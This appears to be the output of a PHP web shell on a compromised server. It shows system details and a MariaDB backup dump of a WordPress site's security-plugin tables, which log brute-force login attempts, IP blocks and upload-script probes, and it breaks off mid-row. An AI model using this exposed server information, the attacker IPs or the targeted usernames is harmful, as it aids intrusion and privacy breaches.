HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux ns3133907 6.8.0-84-generic #84-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 5 22:36:38 UTC 2025 x86_64
User: healthinsuranceukorguk (1111)
PHP: 8.2.28
Disabled: NONE
Upload Files
File: //restore/20230201.westonspiritorguk.sql
-- MariaDB dump 10.19  Distrib 10.5.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: westonspiritorguk
-- ------------------------------------------------------
-- Server version	10.5.18-MariaDB-1:10.5.18+maria~ubu2004

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `westonspiritorguk`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `westonspiritorguk` /*!40100 DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci */;

USE `westonspiritorguk`;

--
-- Table structure for table `cerber_acl`
--

DROP TABLE IF EXISTS `cerber_acl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_acl` (
  `ip` varchar(81) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `tag` char(1) NOT NULL,
  `comments` varchar(250) NOT NULL,
  `acl_slice` smallint(5) unsigned NOT NULL DEFAULT 0,
  `ver6` smallint(5) unsigned NOT NULL DEFAULT 0,
  `v6range` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `req_uri` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  KEY `main_for_selects` (`acl_slice`,`ver6`,`ip_long_begin`,`ip_long_end`,`tag`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_acl`
--

LOCK TABLES `cerber_acl` WRITE;
/*!40000 ALTER TABLE `cerber_acl` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_acl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_blocks`
--

DROP TABLE IF EXISTS `cerber_blocks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_blocks` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `block_until` bigint(20) unsigned NOT NULL,
  `reason` varchar(250) NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  UNIQUE KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_blocks`
--

LOCK TABLES `cerber_blocks` WRITE;
/*!40000 ALTER TABLE `cerber_blocks` DISABLE KEYS */;
INSERT INTO `cerber_blocks` VALUES ('181.143.205.4',1629937697,'Limit on login attempts is reached',701),('185.175.113.72',1629900903,'Limit on login attempts is reached',701),('190.172.103.169',1629917869,'Limit on login attempts is reached',701),('59.96.136.177',1629965587,'Limit on login attempts is reached',701);
/*!40000 ALTER TABLE `cerber_blocks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_countries`
--

DROP TABLE IF EXISTS `cerber_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_countries` (
  `country` char(3) NOT NULL DEFAULT '' COMMENT 'Country code',
  `locale` char(10) NOT NULL DEFAULT '' COMMENT 'Locale i18n',
  `country_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`country`,`locale`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_countries`
--

LOCK TABLES `cerber_countries` WRITE;
/*!40000 ALTER TABLE `cerber_countries` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab`
--

DROP TABLE IF EXISTS `cerber_lab`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  `stamp` bigint(20) unsigned NOT NULL,
  `details` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab`
--

LOCK TABLES `cerber_lab` WRITE;
/*!40000 ALTER TABLE `cerber_lab` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_ip`
--

DROP TABLE IF EXISTS `cerber_lab_ip`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_ip` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reputation` int(11) unsigned NOT NULL,
  `expires` int(11) unsigned NOT NULL,
  PRIMARY KEY (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_ip`
--

LOCK TABLES `cerber_lab_ip` WRITE;
/*!40000 ALTER TABLE `cerber_lab_ip` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_ip` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_net`
--

DROP TABLE IF EXISTS `cerber_lab_net`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_net` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `expires` int(11) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`ip`),
  UNIQUE KEY `begin_end` (`ip_long_begin`,`ip_long_end`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_net`
--

LOCK TABLES `cerber_lab_net` WRITE;
/*!40000 ALTER TABLE `cerber_lab_net` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_net` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_log`
--

DROP TABLE IF EXISTS `cerber_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_log` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_login` varchar(60) NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `activity` int(10) unsigned NOT NULL DEFAULT 0,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `details` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  KEY `ip` (`ip`),
  KEY `ip_long` (`ip_long`),
  KEY `session_index` (`session_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_log`
--

LOCK TABLES `cerber_log` WRITE;
/*!40000 ALTER TABLE `cerber_log` DISABLE KEYS */;
INSERT INTO `cerber_log` VALUES ('185.175.113.72',3115282760,'',0,1629806379.1287,50,'5Krj1sNW2oYafvE9HRTbOLp8','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806382.0090,50,'msg0WcZrt19yOlVi73C5e6Tx','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806411.5037,50,'ojy96gzJE3I4e17AxhVlmiPU','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806412.2257,50,'gNHv4ExbutUWlYIo8LA0OkqC','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806413.5573,50,'iGHurPgFS3ceBAEdkLlb9ZDy','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806414.2766,50,'IY3ZMprn7m6FUh2oOeGtDASQ','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806414.4918,50,'IuvYX1FBSE3MsCZLbnadGp59','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806435.3629,50,'LRJ0mUXtpus7TaH9Q3qxrEjb','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806453.7515,50,'tmpk2CFq8D0zhWrGiHVb6lOL','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806455.0219,50,'tqlA6mTZHdeDGpo7vRxnJOK1','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806459.1690,50,'WTZwblNPr8EpdhY5SLUsg6XJ','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806474.8640,50,'aXIpw2L03hqoGnx7Bsg59FY8','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806475.6172,50,'ziKHkfOuXTgjoUcvqNtFehD4','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806483.1062,50,'arT3OKiX4EeSV6kfG7xRy92j','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806484.2054,50,'HIcsex4mvl0GBEtyrbRWa3PU','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806516.9354,50,'vy1c4iFeUJzXlmHxWqCoh5uf','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806517.8603,50,'rHpekwjfAKEmR9qaUBiDtoI0','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806518.6872,50,'Xvhqo1FDNOLf5uSKJrcWRix2','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806519.0206,50,'xZeUY0Wz9htsgBJNGbrEdjnF','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806661.7178,50,'wgZNkf4H0P1YxcmrlGshevJi','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806662.5746,50,'OWjHKs492wzdXeqxarMoYVfy','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629806688.9878,50,'ogCbAdW5nD7SB01i6xjYGR4h','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('208.110.85.68',3496891716,'org',0,1629807486.2641,51,'jnv3ORma6zsAoxGibwgCQhdI','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('40.77.167.100',676177764,'',0,1629807677.3520,55,'e3JbYmyBrlPSua9iOXLz4Kxj','','19|0|0|0|westonspirit.org.uk/ballet/010034.php'),('40.77.167.100',676177764,'',0,1629807697.6992,55,'WkmYB4RuClyf9dPjpnGEKwtA','','19|0|0|0|westonspirit.org.uk/ballet/010034.php'),('23.228.109.147',400846227,'',0,1629808948.2488,55,'SKdWTsR8PIEoQ52cGixYqN3y','','19|0|0|0|westonspirit.org.uk/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php'),('40.77.167.64',676177728,'',0,1629810247.4771,55,'0MbHcJORZzPWGd2SnQqK3p8a','','19|0|0|0|westonspirit.org.uk/lsj-published.php'),('40.77.167.64',676177728,'',0,1629810267.7908,55,'NvznEgdlYkBXeVSIMZ0fjKwT','','19|0|0|0|westonspirit.org.uk/lsj-published.php'),('5.188.62.76',96222796,'westonspirit',0,1629811543.2819,51,'qGs2Xxu7HEY1iDA5R3vjMPSV','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('69.30.244.19',1159656467,'uk',0,1629812087.7693,51,'p9CdTJAzN4stbY2fleMSBo70','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('185.191.34.215',3116311255,'',0,1629813935.1988,55,'FsORB3QEX7udClve46pbZxDM','','19|0|0|0|www.westonspirit.org.uk/wp-content/themes/twentyseventeen/footer.php'),('208.110.85.68',3496891716,'org',0,1629817539.4216,51,'AnwFoKL7rG4vqtNW3PJfzOlC','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('142.54.181.59',2385950011,'uk',0,1629819303.9697,51,'wZpcM5nNT8WgYoufJdVaDKEi','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('63.141.251.236',1066269676,'admin',0,1629820011.7937,7,'amRUojNAOuB2d7CLhMiwqtlx','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('5.188.62.76',96222796,'westonspirit',0,1629821602.1705,51,'OM5GSvhVUf8gZnIed46pTamq','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('35.229.136.14',602245134,'',0,1629823496.4653,70,'6CQPnljNw3p8Ibkd7iZvom0V','','0|0|0|0|westonspirit.org.uk/wp-json/wp/v2/users/'),('190.172.103.169',3198969769,'westonspirit',0,1629823843.7117,152,'BI6vGASm7w3bx1FCWZictJXT','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'westonspirit',0,1629823844.7565,51,'BIF3jfSZxK9HkoaNY4eQPcEi','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'westonspirit',0,1629823904.4752,152,'xAL9KTbVNg5QECRpP7aYMD8e','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'westonspirit',0,1629823905.5056,51,'iNPFHaAQWlc1fKtTsJjxukY6','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'westonspirit',0,1629824026.4044,152,'rT1oRCfFMaP3cYHLdnGw25J7','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824026.4492,10,'rT1oRCfFMaP3cYHLdnGw25J7','','701|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824027.5308,50,'4fJAQIoCiavESr8u903pk6DM','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824088.3215,71,'sXbDHBxr9loI3GwF2jVg0aUd','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824088.6669,50,'BWtvI6lAyhXxQfpTRGdaVE8U','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824148.5097,71,'PtKj6fDxIpbFl957RkqmUzJX','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824148.9374,50,'blgJk60SYWOHmAtqoVF2Tei8','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824210.0042,71,'JfQ2GDCicaMzZrwqFs89Soyt','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824210.3443,50,'rRThsA8OLoi0lWNItyBwuXbc','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824270.4234,71,'cmUBlEoLtJ0qMfdYjCuIpagn','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824270.4537,71,'bUFieuOt3YCaAEdM8ry2qI0z','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824270.7759,50,'FC0Pxu7ZqhM5sk1mJ8o9OLHe','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824270.8233,50,'iJDjqmr1o70InbRYa9UOXlKv','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824331.9745,71,'nGBrEecfv0djTQDO4a25bPZ9','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824332.3731,50,'7ySLjaXoc6Der3gPOWBvNbZE','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824392.4012,71,'fUuFztpCL5i06bcZ4IKPw2QD','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824392.8520,50,'1ITNA3lr8bnBygSX60aodMDc','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824454.0026,71,'CBisVMWvH9dSb5zPnU0ufX8a','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824454.3425,50,'Qwjibk0vG1L5lsn3uad2cyxU','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824514.4973,71,'Rqn9T8EHMQVeNb6wsdPtG257','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824514.8620,50,'m8xElsyNVFkK3oztpegiW6d5','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('69.30.244.19',1159656467,'westonspirit',0,1629824549.2841,51,'6a4SyiVf9hZYCeRxm2drLkQc','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824575.4494,71,'3TFnicUdeKSxAbDvjCYl6asE','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824575.4801,71,'sHvGRx0t75CN3Te86hnyDjPc','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824575.8081,50,'dDr4veli8FAEuo9W51XOV2sp','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824575.8299,50,'3fT0uqQSWRdEsIialPXUpkB7','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824636.4223,71,'m1WfREaGY6c0K23Dnx7pdlIk','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824636.7853,50,'HsNFqX3nh7JomPWc4VpwdDj0','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824697.5408,71,'rSyNdTGEzhWwFOf0cgYKBnVZ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824697.9174,50,'FrWO9BcDbtU1fGE4CPT3SnzR','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('107.150.59.245',1805007861,'admin',0,1629824747.5094,7,'lSiu6BIEJ0TsFvabgozNOfZ1','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824759.0438,71,'T0CVv72qhIeky5pO9bioWXGQ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824759.4204,50,'ghDC6xKbzRTcEoOaHtSJqu2m','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824819.4921,71,'VupiExqa9RJ0jvHfch7C2oMy','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824819.8507,50,'C3s6FrKSXjw012nfLEJOkZBi','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824881.1326,71,'NEc4Ds8A7ro25yMSYUwPx9aK','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824881.5583,50,'uUeMYQLr6EthnBqoRw3l1Csc','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629824941.5284,71,'RCMUicGTptVflZSB82Oryodx','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629824941.8641,50,'kaTAfxtDgbvUn2Iqp3EHeW89','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825002.9430,71,'pSt1qkUPsuacbKmMYVOeGE0H','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825003.2849,50,'tLM0KyYsRoaPbTZOqp9k5jD4','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825063.5576,71,'Iy5t4eBpK2Yam8rfOQPbg3vn','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825063.9199,50,'ftcXSGEkNCTqm3po7Zh4IPn6','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825125.6306,71,'zUyT0kAKhRxtbSI4rmDGpZEQ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825126.0198,50,'F6DMIjuHEwzWvreib8ZsytlB','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825185.5396,71,'CGvSlgWmob3j4ixZB0IsVQF5','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825185.9468,50,'njtRdOxZeq4DwbCWpBl2NJos','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825246.8188,71,'0nvwR8bLFJagQ9YzKC2kf1Pc','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825247.1500,50,'PRskA0WI4ztvagNdlbY971JF','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825308.1165,71,'tfLaiAHmMTzWlyubXJY7pUrj','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825308.5021,50,'TYXk1hwMQ5CFj3lSNvI4UWf0','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825368.8392,71,'OCPNH1iAckn3Ke7l95mBQpIL','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825369.1781,50,'jXtAuUnGM3cezTpyr5Od2WLI','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825429.6170,71,'wFs7Dfprul2Y8nLT0Rd1HCE5','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825429.9814,50,'qJFSA6aRNI1ur5MkjmezQs3l','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825490.9504,71,'8c4ZdOYVDTCQRlsUJ6o9AuPk','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825491.2993,50,'xIJ2PsZED6tFv4lVYnfMuhj7','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825551.5260,71,'wyIn6irsB2fmTQRdlpvogtAJ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825551.8759,50,'4FSsL5KzTRtlbm0uNBW1ajgH','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825612.9203,71,'JKw1QWfcNY8Mp7Ibl3xmoi2E','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825613.2922,50,'h2XbmpgZPk0yV3CrtwlHvx86','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('103.91.128.114',1734049906,'admin',0,1629825615.2397,152,'HXm3Wj4IL5BCEZnr8tsMoNK9','','0|0|0|0|www.westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825676.7353,71,'kjqVPvsxB3r5mgQlcdzS4YtU','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825677.1449,50,'PvuwK7NrGIBHpil4RhygzUkQ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825816.7776,50,'CmRG3NqouKa7Y5QIX28Dp14d','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825864.8365,71,'uigVvD8Z3KaJwMxYrq0d9Ezm','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825865.1747,50,'e4oq53dwzvsyRHF9AiUNpguk','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825921.4700,71,'sdDMoC6V2bEkL1c8FgzvxYBR','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825921.8579,50,'gvwdqVTJ0Ar4X8LUKNx6zcFo','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629825983.7781,71,'D0JvC54gnMojSlT6dceUf1PQ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629825984.1424,50,'K8x2jnZTQ7bXYqS6DtOMyhlJ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826039.5544,71,'2leNP9bZxB4F7agvQOtsLkRm','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826039.8921,50,'cHuQsRTmW7k8IfxAzDNtoEJv','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826100.9499,71,'fkVqPbO06oD47yhYmN1uwM8p','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826101.3840,50,'NfBDuGekgXypEzMs9xjbZchW','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826161.4371,71,'9ijXK4JnVzYaCZg02QMvbl1U','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826161.7947,50,'2S9QaNh0pojGdqMP3DyvTHlm','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826223.0023,71,'GKm30juSQWLqk5Rbsl6EJioC','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826223.3507,50,'oDyc8F2JpGKaCQH7OWbZm9xN','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826283.4679,71,'l1KOhzLZcGdkINryUgY8JBCQ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826283.7965,50,'CATepQHdcfJnsNP28r0Kw593','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826344.5921,71,'fQEGlgFI1y5wh7LM9xu2T3tB','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826344.9518,50,'DIFZbe9hQHWagtcC2i7JN1lK','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826405.5043,71,'zWJGsEerO5xNBgpitY8KmHAv','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826405.8526,50,'Rh0ktJjyzCPVmfLET7GOD4UW','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,